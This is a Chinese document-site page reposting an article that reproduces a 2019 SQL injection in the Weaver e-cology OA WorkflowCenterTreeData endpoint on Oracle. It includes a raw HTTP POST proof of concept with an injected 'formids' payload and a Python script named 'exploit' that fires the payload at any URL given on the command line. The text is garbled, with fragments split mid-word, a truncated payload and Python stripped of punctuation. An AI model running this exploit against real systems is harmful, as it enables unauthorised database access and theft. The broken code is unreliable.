


下载本文档
版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
1、泛微OA WorkflowCenterTreeData接口注入复现(仅限oracle数据库)作者:BAI原文链接:/s/s83vsNyhnbtmDAV3SXwkyg本文由 干货 收集整理:/test/index.php 背景2019年10月10日CNVD发布了 泛微e-cology OA系统存在SQL注入漏洞。 该漏洞是 由于OA系统的WorkflowCenterTreeData接口中涉及Oracle数据库的SQL语句缺乏安全检查措施所导致的 ,任意攻击者都可借SQL语句拼接时机注入恶意payload,造成SQL
2、注入攻击。 漏洞描述泛型微生态OA系统的WorkflowCenterTreeData接口在使用Oracle数据库时, 由于内置sql语句分解不严密 ,导致其存在的sql注入漏洞(图片来源网络) POC:1点击上方 蓝字 关注我们 POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1Host: ip:portCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.
3、0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 S formids=11111111111)%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0
4、d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0修改NULL后为要查询的分区名,修改为后为查询的表 修复方案:目前官方 尚未发布漏洞补丁 ,所有使用了Oracle数据库的泛微网站都有可能 受到影响 ,请相关网站管理人员在官方发布补丁前及时下线网站。 附上验证脚本:2import requestsimport sysheaders = User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1
5、200.1.25,Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/def exploit(url):target=url+/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333payload=formids=11111111111)%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0if name = main :url=sys.argv1exploit(url)往期精彩内容回顾01 Pockr安全学习地图 02 Ubuntu内核提权(CVE-2017-16995)漏洞的复现&脏牛漏洞 03 WEB安全-端口转发 04 DVWASQL Injection分析及刷洞技巧
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 安全相关的规章制度
- 2025届山东省德州市平原县第一中学物理高一第二学期期末综合测试试题含解析
- 制药厂跨部门协作项目推进办法
- 集团总部大楼管理办法
- 三合一物业收费管理办法
- 云浮市返岗人员管理办法
- 洛龙区党费收缴管理办法
- 科研资助资金管理办法
- 射频美容仪管理办法规定
- 医疗服务业基金管理办法
- GB/T 29776-2013纺织品防虫蛀性能的测定
- DB32T 4176-2021 公共建筑室内空气质量监测系统技术规程
- 中俄文一般贸易合同范本
- 不合格品退货处理单
- 国家开放大学2022春(202207)《2624医药商品营销实务》期末考试真题及答案-开放专科
- 大连海事大学毕业成绩表
- 尾矿库模施袋筑坝工艺在施工中的应用
- 中国34个省级行政区轮廓图
- 人教版三年级下册数学(全册)同步随堂练习一课一练
- 肺小结节定位和肺段切除规划PPT学习课件
- 精品专题资料(2022-2023年收藏)国家电网公司智能电网知识竞赛题目
评论
0/150
提交评论